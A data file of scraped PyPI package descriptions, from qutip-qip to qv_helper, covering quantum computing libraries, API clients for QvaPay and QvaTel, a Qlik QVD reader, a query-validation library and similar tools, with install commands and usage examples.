{"package": "qutip-qip", "pacakge-description": "qutip-qip. The qutip-qip package used to be a module qutip.qip under QuTiP (Quantum Toolbox in Python). From QuTiP 5.0, the community has decided to decrease the size of the core QuTiP package by reducing the external dependencies, in order to simplify maintenance. Hence a few modules are separated from the core QuTiP and will become QuTiP family packages. They are still maintained by the QuTiP team but hosted under different repositories in the QuTiP organization. The qutip-qip package, QuTiP quantum information processing, aims at providing basic tools for quantum computing simulation, both for simple quantum algorithm design and for experimental realization. Compared to other libraries for quantum information processing, qutip-qip puts additional emphasis on the physics layer and the interaction with the QuTiP package. The package offers two different approaches for simulating quantum circuits: one with QubitCircuit, which calculates unitary evolution under quantum gates by matrix products, and another called Processor, which uses the open system solvers in QuTiP to simulate a noisy quantum device.
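To make the first of those two approaches concrete, a minimal gate-level sketch could look as follows. This is an illustrative example, not taken from the package README; gate names follow qutip-qip's conventions (\"SNOT\" is its name for the Hadamard gate), and the run() call assumes the plain matrix-product simulation described above:
from qutip import basis, tensor
from qutip_qip.circuit import QubitCircuit

# two-qubit Bell-state circuit: Hadamard on qubit 0, then CNOT(0 -> 1)
qc = QubitCircuit(N=2)
qc.add_gate("SNOT", targets=[0])
qc.add_gate("CNOT", controls=0, targets=1)

# propagate |00> through the circuit by multiplying the gate unitaries
zero_zero = tensor(basis(2, 0), basis(2, 0))
final_state = qc.run(state=zero_zero)
print(final_state)
The Processor-based approach instead compiles such a circuit to control pulses and simulates it with QuTiP's open system solvers, so the same circuit can be studied under hardware-style noise.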
If you would like to know the future development plan and ideas, have a look at the discussion panel as well as the qutip documentation for ideas.
Quick start: To install the package, use pip install qutip-qip
Migrating from qutip.qip: As the introduction suggested, this package is based on a module in the QuTiP package, qutip.qip. If you were using the qutip package and now want to try out the new features included in this package, you can simply install this package and replace all the qutip.qip in your import statements with qutip_qip. Everything should work smoothly as usual.
Documentation and tutorials: The documentation of qutip-qip, updated to the latest development version, is hosted at qutip-qip.readthedocs.io/. Tutorials related to using quantum gates and circuits in qutip-qip can be found here and those related to using noise simulators are available at this link. Code examples used in the article Pulse-level noisy quantum circuits with QuTiP, updated for the latest code version, are hosted in this folder.
Installation from source: If you want to edit the source code, please download the source code and run the following commands under the root qutip-qip folder: pip install --upgrade pip && pip install -e . which makes sure that you are up to date with the latest pip version. Contribution guidelines are available here. To build and test the documentation, additional packages need to be installed: pip install pytest matplotlib sphinx numpydoc sphinx_rtd_theme. Under the doc directory, use make html to build the documentation, or make doctest to test the code in the documentation.
Testing: To test the installation, choose the correct branch that matches the version, e.g., qutip-qip-0.2.X for version 0.2. Then download the source code and run, from the qutip-qip directory: pytest tests
Citing qutip-qip: If you use qutip-qip in your research, please cite the article as
@article{Li2022pulselevelnoisy,
  doi = {10.22331/q-2022-01-24-630},
  url = {https://doi.org/10.22331/q-2022-01-24-630},
  title = {Pulse-level noisy quantum circuits with {Q}u{T}i{P}},
  author = {Li, Boxi and Ahmed, Shahnawaz and Saraogi, Sidhant and Lambert, Neill and Nori, Franco and Pitchford, Alexander and Shammah, Nathan},
  journal = {{Quantum}},
  issn = {2521-327X},
  publisher = {{Verein zur F{\"{o}}rderung des Open Access Publizierens in den Quantenwissenschaften}},
  volume = {6},
  pages = {630},
  month = jan,
  year = {2022}
}
Support: This package is supported and maintained by the same developers group as QuTiP. QuTiP development is supported by Nori's lab at RIKEN, by the University of Sherbrooke, by Chalmers University of Technology, by Macquarie University and by Aberystwyth University, among other supporting organizations.
License: You are free to use this software, with or without modification, provided that the conditions listed in the LICENSE.txt file are satisfied."}
{"package": "qutip-qtrl", "pacakge-description": "qutip-qtrl. The qutip-qtrl package used to be a module qutip.control under QuTiP (Quantum Toolbox in Python). From QuTiP 5.0, the community has decided to decrease the size of the core QuTiP package by reducing the external dependencies, in order to simplify maintenance. Hence a few modules are separated from the core QuTiP and will become QuTiP family packages. They are still maintained by the QuTiP team but hosted under different repositories in the QuTiP organization. The qutip-qtrl package, QuTiP quantum optimal control, aims at providing advanced tools for the optimal control of quantum devices. Compared to other libraries for quantum optimal control, qutip-qtrl puts additional emphasis on the physics layer and the interaction with the QuTiP package. The package offers support for both the CRAB and GRAPE methods. If you would like to know the future development plan and ideas, have a look at the qutip documentation for ideas.
Quick start: To install the package, use pip install qutip-qtrl
Migrating from qutip.control: As the introduction suggested, this package is based on a module in the QuTiP package, qutip.control. If you were using the qutip package and now want to try out the new features included in this package, you can simply install this package and replace all the qutip.control in your import statements with qutip_qtrl. Everything should work smoothly as usual.
Documentation and tutorials: The documentation of qutip-qtrl, updated to the latest development version, is hosted at qutip-qtrl.readthedocs.io/. Tutorials related to using quantum optimal control in qutip-qtrl can be found here.
Installation from source: If you want to edit the source code, please download the source code and run the following commands under the root qutip-qtrl folder: pip install --upgrade pip && pip install -e . which makes sure that you are up to date with the latest pip version. Contribution guidelines are available here. To build and test the documentation, additional packages need to be installed: pip install pytest matplotlib sphinx numpydoc sphinx_rtd_theme. Under the doc directory, use make html to build the documentation, or make doctest to test the code in the documentation.
Testing: To test the installation, choose the correct branch that matches the version, e.g., qutip-qtrl-0.2.X for version 0.2. 
Then download the source code and run from thequtip-qtrldirectory.pytest testsCitingqutip-qtrlIf you usequtip-qtrlin your research, please cite the original QuTiP papers that are availablehere.SupportThis package is supported and maintained by the same developers group as QuTiP.QuTiP development is supported byNori's labat RIKEN, by the University of Sherbrooke, by Chalmers University of Technology, by Macquarie University and by Aberystwyth University,among other supporting organizations.LicenseYou are free to use this software, with or without modification, provided that the conditions listed in the LICENSE.txt file are satisfied."} +{"package": "qutk", "pacakge-description": "No description available on PyPI."} +{"package": "qutorch", "pacakge-description": "Framework to simulate quantum circuits with PyTorch.# DescriptionIt consists of one main module:q_simulator: main simulator to run quantum circuits# Installation## Normal installation`bash pip install qutorch `## Development installation`bash git clonehttps://github.com/MarioDuran/qutorch.gitcd qutorch pip install--editable. `"} +{"package": "qutree", "pacakge-description": "OverviewPlot sets of multiqubit quantum pure states as a binary tree of Bloch spheres.We present a representation that can display several arbitrary multi-qubit pure states, using a combination of the Bloch Sphere and the Schmidt decomposition.Our current approaches to visualization of quantum states allow to display:several mono-qubit states, using the Bloch spherea single multi-qubit state, sometimes with additional restrictions such as symmetryUsageinstall with pip:pip install qutreeAnd you will be able to produce this type of Bloch sphere\u2019s tree:More information can be found in ourdocumentation.CitingIf you find qutree useful in your research, please consider citing the following papers to support our work. Thank you for your support.Barthe, A., Grossi, M., Tura, J., and Dunjko, V.. (2023). Bloch Sphere Binary Trees: A method for the visualization of sets of multi-qubit systems pure states.https://doi.org/10.48550/arXiv.2302.02957ContributeIf you want to contribute you can fork the project in your own repository and then use it. If you consider working with us, please follow thecontributing guidelines.Meet ourcontributor."} +{"package": "qutritium", "pacakge-description": "IMAGE REFERENCEQutritiumWhat is Qutritium?It is a Python package that provides qutrit processing techniques such as calibration and decomposition, etc (not exclusive).Qutritium enables students researchers to run a qutrit system on available quantum computers which mainly comes from IBM cloud quantum computers.\ud83d\udce6 InstallationQutritiumruns in python environment. 
Users can download the newest Python release here. Recommendation: Anaconda for environment separation. pip install qutritium
✅ Qutritium Available Functions: Protocol / Purpose and functionalities: Calibration ..., Virtual Machine ..., Decomposition ...
✍️ Usage/Examples: from qutritium.calibration import TR01
👥 Authors: Son Pham, Tien Nguyen, Bao Bach
🧾 License: MIT License
📌 Documentation: Documentation"}
{"package": "qutrunk", "pacakge-description": "QuTrunk
Overview: QuTrunk is a free, open-source, cross-platform quantum computing programming framework developed independently by QuDoor (启科量子). It includes a quantum programming API, quantum instruction translation, and quantum computing backend interfaces. QuTrunk uses Python as its host language and exploits Python's syntax to implement a DSL (domain-specific language) for quantum programs, so it can be used from any IDE that supports Python. Based on concepts such as quantum logic gates and quantum circuits, QuTrunk provides the APIs needed for quantum programming; these APIs are implemented by the corresponding modules. For example, QCircuit implements the quantum circuit, Qubit the qubit, Qureg the quantum register, Command the instruction for each quantum gate operation, Backend the backend module that runs the quantum circuit, and the gate module the basic quantum gate operations. QuTrunk can also serve as the foundation for higher-level quantum computing applications, for example quantum algorithms, visual quantum programming, and quantum machine learning.
QuTrunk's internal modules and their hierarchy are as follows. Core modules: cicuit: the quantum circuit; builds a circuit by applying the basic gate and operator operations and represents the implementation of the whole quantum algorithm. qubit: a single qubit, the target object of gate and operator operations. qureg: requests quantum computing resources and maintains a number of qubits in order to implement a concrete quantum algorithm. gate: the quantum logic gate module, providing the basic gate operations, including H, X, Y, Z, P, R, Rx, Ry, Rz, S, Sdg, T, Tdg, CNOT, Toffoli, Swap, etc. operator: quantum operator operations that implement common quantum operations out of several basic gates, such as quantum amplitude amplification (QAA) and the quantum Fourier transform (QFT). command: parameterizes all gate-level operations in the quantum circuit and interfaces with the target backend module, which runs the whole circuit. qasm: compatible with the OpenQASM 2.0 standard; implements serialization and deserialization between quantum circuits and OpenQASM instructions. qusl: QuTrunk's quantum assembly standard, providing functionality similar to qasm. backend: the quantum computing backend module used to execute quantum circuits; it supports a local Python backend, the two remote backends qusprout and qusaas, and third-party backends (currently IBM and AWS Braket). qusprout: interfaces with the qubox device developed by QuDoor; it uses classical computing resources optimized for quantum computation and provides a high-performance quantum simulation service. qusaas: interfaces with QuDoor's quantum computing cloud platform, which gives access to several kinds of quantum computing resources, including classical computing resources and a trapped-ion quantum computer (under development).
Main features: quantum program development based on quantum logic gates, quantum operators and quantum circuits; the QuSL quantum assembly instruction standard, fully compatible with Python code; device independence, so the same quantum circuit can run on different quantum backends simply by switching the backend type; several quantum computing modes, with a Python backend for local computation and OMP multi-threading, MPI multi-node parallelism and GPU acceleration on the remote backends, plus a reserved interface to the trapped-ion quantum computer developed by QuDoor itself; compatibility with multiple quantum assembly formats, namely the OpenQASM 2.0 standard and the QuSL assembly standard; support for visual quantum programming (in combination with QuBranch, the quantum integrated development environment developed by QuDoor).
Download and install: pip install: QuTrunk is published on PyPI and can be installed with the pip command. Note that before using QuTrunk you need to install Python (version 3.8+).
pip install qutrunk
# optional extra: braket, to use AWS Braket as a quantum computing backend
pip install 'qutrunk[braket]'
# optional extra: parallel, for multi-node parallel computation
pip install 'qutrunk[parallel]'
# optional extra: gpu, for GPU acceleration (currently up to CUDA 11)
pip install 'qutrunk[gpu]'
To verify that QuTrunk is installed correctly, open a terminal, enter Python's interactive mode and run:
import qutrunk
qutrunk.run_check()
The output \"QuTrunk is installed successfully! You can use QuTrunk now.\" indicates that the installation succeeded.
Example code: The following example uses QuTrunk to run the bell-pair quantum algorithm:
# import package
from qutrunk.circuit import QCircuit
from qutrunk.circuit.gates import H, CNOT, Measure, All
# allocate resource
qc = QCircuit()
qr = qc.allocate(2)
# apply quantum gates
H * qr[0]
CNOT * (qr[0], qr[1])
All(Measure) * qr
# print circuit
qc.print()
# run circuit
res = qc.run(shots=1024)
# print result
print(res.get_counts())
# draw circuit
qc.draw()
Run result: (shown as an image in the original README).
Visual quantum programming: QuBranch is a quantum programming integrated development environment built by QuDoor on top of VS Code. Used together, QuTrunk and QuBranch enable visual quantum programming; the concrete steps are described in the visual quantum programming documentation. See also the QuTrunk quick-start tutorial and the QuTrunk API reference.
How to contribute: read the source code to understand our current development direction; find a feature or module you are interested in and develop it, then test that it works correctly; fork the repository and commit your fix to your fork; open a pull request. For more details please see the link.
License: QuTrunk is free and open source, released under version 2.0 of the Apache License."}
{"package": "quuz", "pacakge-description": "No description available on PyPI."}
{"package": "quwiki", "pacakge-description": "No description available on PyPI."}
{"package": "quxidget", "pacakge-description": "No description available on PyPI."}
{"package": "quxr", "pacakge-description": "QUXR. This package contains common methods used in Quantitative UX Research."}
{"package": "quyckplot", "pacakge-description": "A package that helps the process of loading multiple files and plotting the data inside."}
{"package": "quy_nestery", "pacakge-description": "No description available on PyPI."}
{"package": "quyuan", "pacakge-description": "quyuan is a fork of tagore with several modifications to make it more suitable for my own use.
Installation: quyuan is a simple Python script with several dependencies.
$ pip install git+https://github.com/tcztzy/quyuan.git
$ quyuan --version
quyuan, version 1.1.2
Requirements: Python 3.6+, CairoSVG, Click, Colorama.
Quick start: The demo data consists of Catalogue of Somatic Mutations in Cancer (COSMIC) Cancer Gene Census genes and 100 randomly simulated mutations. Points represent single nucleotide variants (i.e. variant present in <3 samples); triangles represent single nucleotide polymorphisms (i.e. 
variants found in many samples); and short lines (single chromosome) represent known INDEL sites.$quyuan--inputexample_ideogram/test.bed--prefixexample_ideogram/example-vfUsageUsage: quyuan [OPTIONS]\n\n quyuan: a utility for illustrating human chromosomes\n https://github.com/tcztzy/quyuan\n\nOptions:\n --version Show the version and exit.\n -i, --input Input BED-like file [required]\n -p, --prefix [output file prefix]\n Output prefix [Default: \"out\"]\n -b, --build [hg37|hg38|irgsp1] Human genome build to use [Default: hg38]\n -f, --force Overwrite output files if they exist already\n -ofmt, --oformat [png|pdf|ps|svg]\n Output format for conversion\n -v, --verbose Display verbose output\n --help Show this message and exit.The input file is a bed-like format, described below. If an output prefix is not specified, the scripts uses \"out\" as the default prefix.Helper scripts for converting RFMix and ADMIXTURE outputs are included in thescripts/folder.A more complete example of a full chromosome painting using an RFMix output can be seen by running:rfmix2tagore--chr1example_ideogram/1KGP-MXL104_chr1.bed\\--chr2example_ideogram/1KGP-MXL104_chr2.bed\\--outexample_ideogram/1KGP-MXL104_tagore.bed\n\nquyuan--inputexample_ideogram/1KGP-MXL104_tagore.bed\\--prefixexample_ideogram/1KGP-MXL104\\--buildhg37\\--verboseInput file description#chr\tstart\tstop\tfeature\tsize\tcolor\tchrCopy\nchr1\t10000000\t20000000\t0\t1\t#FF0000\t1\nchr2\t20000000\t30000000\t0\t1\t#FF0000\t2\nchr2\t40000000\t50000000\t0\t0.5\t#FF0000\t1Each column is explained below:chr- The chromosome on which a feature has to be drawnstart- Start position (in bp) for featurestop- Stop position (in bp) for featurefeature- The shape of the feature to be drawn0 will draw a rectangle1 will draw a circle2 will draw a triangle pointing to the genomic location3 will draw a line at that genomic locationsize- The horizontal size of the feature. Should range between 0 and 1.color- Specify the color of the genomic feature with a hex value (#FF0000 for red, etc.)chrCopy- Specify the chromosome copy on which the feature should be drawn (1 or 2). To draw the same feature on both chromosomes, you must specify the feature twiceEtymologyQu Yuan(\u5c48\u539f) was a Chinese patriot poet and politician living in c.340BC - 278BC."} +{"package": "qval", "pacakge-description": "Qval | Query params validation libraryInstallationBasic usageFramework-specific instructionsDjango Rest FrameworkPlain DjangoFlaskFalconDocsConfigurationLoggingAboutQval is a query parameters validation library designed to be used in small projects that require a lot of repetitive\nparameter validation. In contrast with DRF'sValidators(and other serialization abstractions), Qval requires almost no boilerplate.Installation$pipinstallqvalBasic UsageYou can use Qval both as a function and a decorator. The functionvalidate()accepts 3 positional arguments and 1 named:# qval.pydefvalidate(request:Union[Request,Dict[str,str]],# Request instance. Must implement the request interface or be a dictionaryvalidators:Dict[str,Validator]=None,# A Dictionary in the form of (param_name -> `Validator()` object)box_all:bool=True,# If True, adds all query parameters to the params object**factories:Optional[Callable[[str],object]],# Factories for mapping `str` params to Python objects.)->QueryParamValidator:A Use CaseLet's say that you are developing a RESTful calculator that has an endpoint called/api/divide. 
You can usevalidate()to automatically convert the parameters to python objects and then validate them:fromqvalimportvalidate...defdivision_view(request):\"\"\"GET /api/divide?param a : intparam b : int, nonzeroparam token : string, length = 12Example: GET /api/divide?a=10&b=2&token=abcdefghijkl -> 200, {\"answer\": 5}\"\"\"# Parameter validation occurs in the context manager.# If validation fails or user code throws an error, the context manager# will raise InvalidQueryParamException or APIException respectively.# In Django Rest Framework, these exceptions will be processed and result# in the error codes 400 and 500 on the client side.params=(# `a` and `b` must be integers.# Note: in order to get a nice error message on the client side,# you factory should raise either ValueError or TypeErrorvalidate(request,a=int,b=int)# `b` must be anything but zero.nonzero(\"b\")# The `transform` callable will be applied to the parameter before the check.# In this case we'll get `token`'s length and check if it is equal to 12..eq(\"token\",12,transform=len))# validation starts herewithparamsasp:returnResponse({\"answer\":p.a//p.b})// GET /api/divide?a=10&b=2&token=abcdefghijkl// Browser:{\"answer\":5}Sending b = 0 to this endpoint will result in the following message on the client side:// GET /api/divide?a=10&b=0&token=abcdefghijkl{\"error\":\"Invalid `b` value: 0.\"}If you have many parameters and custom validators, it's better to use the@qval()decorator:# validators.pyfromdecimalimportDecimalfromqvalimportValidator,QvalValidationError...defprice_validator(price:int)->bool:\"\"\"A predicate to validate `price` query parameter.Provides custom error message.\"\"\"ifprice<=0:# If price does not match our requirements, we raise QvalValidationError() with a custom message.# This exception will be handled in the context manager and will be reraised# as InvalidQueryParamException() [HTTP 400].raiseQvalValidationError(f\"Price must be greater than zero, got\\'{price}\\'.\")returnTruepurchase_factories={\"price\":Decimal,\"item_id\":int,\"token\":None}purchase_validators={\"token\":Validator(lambdax:len(x)==12),# Validator(p) can be omitted if there is only one predicate:\"item_id\":lambdax:x>=0,\"price\":price_validator,}# views.pyfromqvalimportqvalfromvalidatorsimport*...# Any function or method wrapped with `qval()` must accept `request` as# either first or second argument, and `params` as last.@qval(purchase_factories,purchase_validators)defpurchase_view(request,params):\"\"\"GET /api/purchase?param item_id : int, positiveparam price : float, greater than zeroparam token : string, len == 12Example: GET /api/purchase?item_id=1&price=5.8&token=abcdefghijkl\"\"\"print(f\"{params.item_id}costs{params.price}$.\")...Framework-specific InstructionsDjango Rest Framework works straight out of the box. Simply add@qval()to your views or usevalidate()inside.For DjangowithoutDRF you may need to add the exception handler tosettings.MIDDLEWARE. Qval attempts to\ndo it automatically ifDJANO_SETTINGS_MODULEis set. 
Otherwise you'll see the following message:WARNING:root:UnabletoaddtheAPIExceptionmiddlewaretotheMIDDLEWARElist.Djangodoesnot\nsupportAPIExceptionhandlingwithoutDRFintegration.DefineDJANGO_SETTINGS_MODULEor\nadd'qval.framework_integration.HandleAPIExceptionDjango'totheMIDDLEWARElist.Take a look at the plain Django examplehere.If you are using Flask, you will need to setup the exception handlers:fromflaskimportFlaskfromqval.framework_integrationimportsetup_flask_error_handlers...app=Flask(__name__)setup_flask_error_handlers(app)Sincerequestin Flask is a global object, you may want to curry@qval()before usage:fromflaskimportrequestfromqvalimportqval_curry# Firstly, curry `qval()`qval=qval_curry(request)...# Then use it as a decorator.# Note: you view now must accept `request` as its first argument@app.route(...)@qval(...)defview(request,params):...Check out the full Flaskexampleinexamples/flask-example.py.You can run the example using the command below:$ PYTHONPATH=. FLASK_APP=examples/flask-example.py flask runSimilarly to Flask, with Falcon you will need to setup the error handlers:importfalconfromqval.framework_integrationimportsetup_falcon_error_handlers...app=falcon.API()setup_falcon_error_handlers(app)Full Falconexamplecan be found here:examples/falcon-example.py.Use the following command to run the app:$ PYTHONPATH=. python examples/falcon-example.pyDocsRefer to thedocumentationfor more verbose descriptions and auto-generated API docs.\nYou can also look at theteststo get a better idea of how the library works.ConfigurationQval supports configuration via python config files and environmental variables.\nIfDJANGO_SETTINGS_MODULEorSETTINGS_MODULEis defined, the specified config module will be used. Otherwise,\nall lookups will be done inos.environ.Supported variables:QVAL_MAKE_REQUEST_WRAPPER = myapp.myfile.my_func. Customizes the behaviour of themake_request()function,\nwhich is applied to all incoming requests. The result of this function is then passed toqval.qval.QueryParamValidator.\nThe provided function must acceptrequestand return an object that supports the request interface\n(seeqval.framework_integration.DummyReqiest).For example, the following code adds logging to eachmake_request()call:# app/utils.pydefmy_wrapper(f):@functools.wraps(f)defwrapper(request):print(f\"Received a new request:{request}\")returnf(request)returnwrapperYou will also need to set the environment variableexport QVAL_MAKE_REQUEST_WRAPPER=app.utils.my_wrapperin your terminal or add it to the used config file.QVAL_REQUEST_CLASS = path.to.CustomRequestClass.@qval()will use it to determine whether the first or second argument is the request.\nIf you have a custom request class that implements theqval.framework_integration.DummyRequestinterface, provide it using this variable.LoggingQval uses a global object calledlogfor reporting errors. You can disable this by callinglog.disable(). 
Here's an example error message:Anerroroccurredduringthevalidationorinsidethecontext:exc``((34,'Numerical result out of range')).|Parameters:|Body:b''|Exception:\nTraceback(mostrecentcalllast):File\"/qval/qval.py\",line338,ininnerreturnf(*args,params,**kwargs)File\"/examples/django-example/app/views.py\",line46,inpow_viewreturnJsonResponse({\"answer\":params.a**params.b})OverflowError:(34,'Numerical result out of range')InternalServerError:/api/pow[19/Nov/201807:03:15]\"GET /api/pow?a=2.2324&b=30000000 HTTP/1.1\"500102Disable the logging with the following code:fromqvalimportloglog.disable()"} +{"package": "qvalidate", "pacakge-description": "A package to find area of different figures"} +{"package": "qvalidate2", "pacakge-description": "A package to find area of different figures"} +{"package": "qvalidation", "pacakge-description": "No description available on PyPI."} +{"package": "qvalue", "pacakge-description": "No description available on PyPI."} +{"package": "qvalve", "pacakge-description": "qvalve - Query Valve Main and Game ServersUsageqvalve [--max-threads NUM] [--debug] [--show-players] [--show-keywords]\n [--show-tags] [--report-keywords] [--max-servers NUM]\n [--regions NUM [NUM ...]] [--appid NUM] [--empty NUM]\n [--full NUM] [--noplayers NUM] [--map-name NAME]\n [--map-prefix PREFIX] [--min-players NUM] [--no-max-players]\n [--max-ping NUM] [--no-mm-strict-1] [--web-server] [-h] [-v]\n [-V] [--config FILE] [--print-config] [--print-url]\n [--completion [SHELL]]\n [ADDR ...]SearchValves Main server for Game servers. Integrated withtf2mons\nhacker-database to identify known cheaters on game servers. Click on a\nserver to show/hide its players;Ctrl-Clickon server (or players) to\nsubsequently connect to that server whenF12is pressed in-game.Options--max-threads NUM Run `NUM` threads for game server comms (default:\n `10`).\n--debug Pretty-print raw response records (default: `False`).\n--show-players Print `A2S_PLAYER.names` (default: `False`).\n--show-keywords Print `A2S_INFO.keywords` (default: `False`).\n--show-tags Print `A2S_RULES.sv_tags` (default: `False`).\n--report-keywords Print keywords report (default: `False`).Stage one filters, sent to valve in query to get list of remote game servers--max-servers NUM Get no more than `NUM` servers per region (default:\n `100`).\n--regions NUM [NUM ...]\n Get servers for list of regions (default: `[0, 1, 2,\n 3]`).\n--appid NUM Servers that are running game (default: `440`).\n--empty NUM Servers that are not empty.\n--full NUM Servers that are not full.\n--noplayers NUM Servers that are empty.\n--map-name NAME Match map `NAME` (exact).\n--map-prefix PREFIX\n Match map names that start with `PREFIX`.Stage two filters, applied after querying valve--min-players NUM Where number of players is at least NUM.\n--no-max-players Where number of players is less than its\n `max_players`.\n--max-ping NUM Where ping is NUM or less.\n--no-mm-strict-1 Where tf_mm_strict is not 1.Usage 2ADDR Query list of Game server addresses, where ADDR is\n `IP:PORTNO`.Usage 3--web-server Run web server.General options-h, --help Show this help message and exit.\n-v, --verbose `-v` for detailed output and `-vv` for more detailed.\n-V, --version Print version number and exit.\n--config FILE Use config `FILE` (default: `~/.qvalve.toml`).\n--print-config Print effective config and exit.\n--print-url Print project url and exit.\n--completion [SHELL]\n Print completion scripts for `SHELL` and exit\n (default: `bash`)."} +{"package": "qvantum", "pacakge-description": 
"1. Summaryqvantum is a python module, and it's goal is to ensure an easy use library for understanding quantum computing better or designing new quantum algorithms. Working with this module helps you to get more familiar with the basic concepts such as qubit, register or quantum gate, meanwhile the tool has the power for deeper analysis and development.The module is in beta release phase: tested but it might contain bugs, therefore every constructive note is highly appreciated. Also if you would like to collaborate in the developing process do not hesitate to contact us.2. Installationqvantum module can be easily installed using three different approach below (you could extend the commands below like \"/path/to/python.exe -m pip install ...\", if python wasn't in your PATH)2.1 pip installThe latest version of the module can be installed online from the PyPi page using pip in command line:pip install qvantumorpip install --index-url https://test.pypi.org/simple qvantum2.2 wheel installThe latest version of the module can be downloaded from the PyPi page in .whl format which can be used for installation:pip install qvantum-x.xx-py2.py3-none-any.whl2.3 setup fileA setup.py file is also available on PyPi page. Download the file and the folder called \"qvantum\" then run the command in the folder where all the files were downloaded. Use \u00e2\u20ac\u201ce if you want the module be immediately available for every user in your system:pip install .orpip install \u00e2\u20ac\u201ce .3. DocumentationGitHub - qvantum"} +{"package": "qvapay", "pacakge-description": "Python SDK for the QvaPay APINon official, but friendly QvaPay library for the Python language.SetupYou can install this package by using the pip tool and installing:pipinstallqvapayOreasy_installqvapaySign up onQvaPayCreate your account to process payments throughQvaPayatqvapay.com/register.Using the clientFirst, import theAsyncQvaPayClient(orSyncQvaPayClient) class and create yourQvaPayasynchronous (or synchronous) client using your app credentials.fromqvapay.v1importAsyncQvaPayClientclient=AsyncQvaPayClient(app_id,app_secret)It is also possible to use theQvaPayAuthclass (which by default obtains its properties from environment variables or from the content of the.envfile) and the static methodAsyncQvaPayClient.from_auth(orSyncQvaPayClient.from_auth) to initialize the client.fromqvapay.v1importAsyncQvaPayClient,QvaPayAuthclient=AsyncQvaPayClient.from_auth(QvaPayAuth())Use context managerThe recommended way to use a client is as a context manager. 
For example:asyncwithAsyncQvaPayClient(...)asclient:# Do anything you want...orwithSyncQvaPayClient(...)asclient:# Do anything you want...Get your app info# Use await when using AsyncQvaPayClient# With SyncQvaPayClient it is not necessary.info=awaitclient.get_info()Get your account balance# Use await when using AsyncQvaPayClient# With SyncQvaPayClient it is not necessary.balance=awaitclient.get_balance()Create an invoice# Use await when using AsyncQvaPayClient# With SyncQvaPayClient it is not necessary.transaction=awaitclient.create_invoice(amount=10,description='Ebook',remote_id='EE-BOOk-123'# example remote invoice id)Get transaction# Use await when using AsyncQvaPayClient# With SyncQvaPayClient it is not necessary.transaction=awaitclient.get_transaction(id)Get transactions# Use await when using AsyncQvaPayClient# With SyncQvaPayClient it is not necessary.transactions=awaitclient.get_transactions(page=1)You can also read theQvaPay APIdocumentation:qvapay.com/docs.For developersThe_syncfolders were generated automatically executing the commandunasync qvapay tests.The code that is added in the_asyncfolders is automatically transformed.So every time to make a change you must run the commandunasync qvapay teststo regenerate the folders_syncwith the synchronous version of the implementation.Improvetestsimplementation and addpre-commitsystem to ensure format and style.Migration guide0.2.0 -> 0.3.0QvaPayClientwas divided into two classes:AsyncQvaPayClientandSyncQvaPayClient. Both classes have the same methods and properties, with the difference that the methods inAsyncQvaPayClientare asynchronous and inSyncQvaPayClientare synchronous.0.1.0 -> 0.2.0user_idofTransactionmodel was removedpaid_by_user_idofTransactionmodel was removed0.0.3 -> 0.1.0from qvapay.v1 import *instead offrom qvapay import *QvaPayClientinstead ofClientclient.get_infoinstead ofclient.infoclient.get_balanceinstead ofclient.balanceclient.get_transactionsinstead ofclient.transactionsContributors \u2728Thanks goes to these wonderful people (emoji key):Carlos Lugones\ud83d\udcbbOzkar L. Garcell\ud83d\udcbbLeynier Guti\u00e9rrez Gonz\u00e1lez\ud83d\udcbbJorge Alejandro Jimenez Luna\ud83d\udcbbReinier Hern\u00e1ndez\ud83d\udc1bThis project follows theall-contributorsspecification. Contributions of any kind welcome!"} +{"package": "qvatel-sms-api", "pacakge-description": "QvaTel Python LibraryEsta librer\u00eda proporciona una interfaz de Python para interactuar con la API de SMS de QvaTelFuncionesEnviar mensajes SMS.Obtener el estado de los mensajes.Consultar el balance de la cuenta.RequisitosPython 3.6 o superior.Una cuenta de QvaTel con un API token de SMS.Instalaci\u00f3nInstala la librer\u00eda usando pip:pip install qvatel-sms-apiUsoAqu\u00ed hay un ejemplo b\u00e1sico de c\u00f3mo usar la librer\u00eda para enviar un SMS, obtener el estado de un mensaje y consultar el balance de la cuenta:fromqvatel.clientimportQvaTelClient# Inicializa el cliente con tu API tokenclient=QvaTelClient('your_api_token_here')# Env\u00eda un SMSdestination='+5352942387'message='Hola mundo desde QvaTel'response=client.send_sms(destination,message)print(response)# Obtiene el estado de un mensajemessage_id='your_message_id_here'status=client.get_message_status(message_id)print(status)# Obtiene el balance de la cuentabalance=client.get_account_balance()print(balance)ContribucionesLas contribuciones son bienvenidas. 
Please open an issue if you find a bug or have a feature request."}
{"package": "qvd", "pacakge-description": "Read Qlik Sense .qvd files \ud83d\udee0\nA Python library for reading the Qlik Sense .qvd file format, written in Rust.\nFiles can be read to a DataFrame or a dictionary.\nInstall\nInstall from PyPI (https://pypi.org/project/qvd/):\npip install qvd\nUsage\nfrom qvd import qvd_reader\ndf = qvd_reader.read('test.qvd')\nprint(df)\nDeveloping\nCreate a virtual env (https://docs.python-guide.org/dev/virtualenvs/) and activate it:\npython3 -m venv venv\nThen install dev dependencies:\npip install pandas maturin\nAfterwards, run maturin develop --release to install the generated Python lib to the virtual env.\nTest\nTo run the tests, you can use these commands:\ncargo test  # runs all Rust unit tests\npytest test_qvd_reader.py  # runs all Python tests\nQVD File Structure\nA QVD file is split into 3 parts: XML metadata, the symbol table and the bit-stuffed binary indexes.\nXML Metadata\nThis section is at the top of the file and is in human readable XML. This section contains metadata about the file in general, such as the table name, number of records and size of records, as well as data about individual fields, including field name, length and offset in the symbol table.\nSymbol table\nDirectly after the XML section is the symbol table. This is a table of every unique value contained within each column. The columns are in the order described in the metadata fields section. In the metadata we can find the byte offset from the start of the symbols section for each column. Symbol types cannot be determined from the metadata and are instead determined by a flag byte preceding each symbol. These types are:\n1 - 4 byte signed int (u32) - little endian\n2 - 8 byte signed float (f64) - little endian\n4 - null terminated string\n5 - 4 bytes of junk followed by a null terminated string representing an integer\n6 - 8 bytes of junk followed by a null terminated string representing a float\n(see the decoding sketch below)\nBinary Indexes\nAfter the symbol table are the binary indexes that map to the symbols for each row. They are bit stuffed and reversed binary numbers that point to the index of the symbol in the symbol table for each field."}
{"package": "qv-helper", "pacakge-description": "Quick Visualization Helper\nTHE helper package for Quick Visualization that you need. qv_helper is a newly designed package to facilitate data visualization. As researchers or analysts, we often need to perform preliminary visualizations before analysis. While the plots may show some seemingly promising effects, a statistical test may reveal otherwise. Sometimes, we will want to look at both the plots and the statistical test results. Currently, there is no single package or function that performs both visualization and tests simultaneously. Having statistical test results automatically generated can facilitate the pipeline of exploratory data analysis (EDA) while helping researchers to quickly grasp a better sense of the data, with statistics as supplements to plots. This is why I want to build qv_helper. 
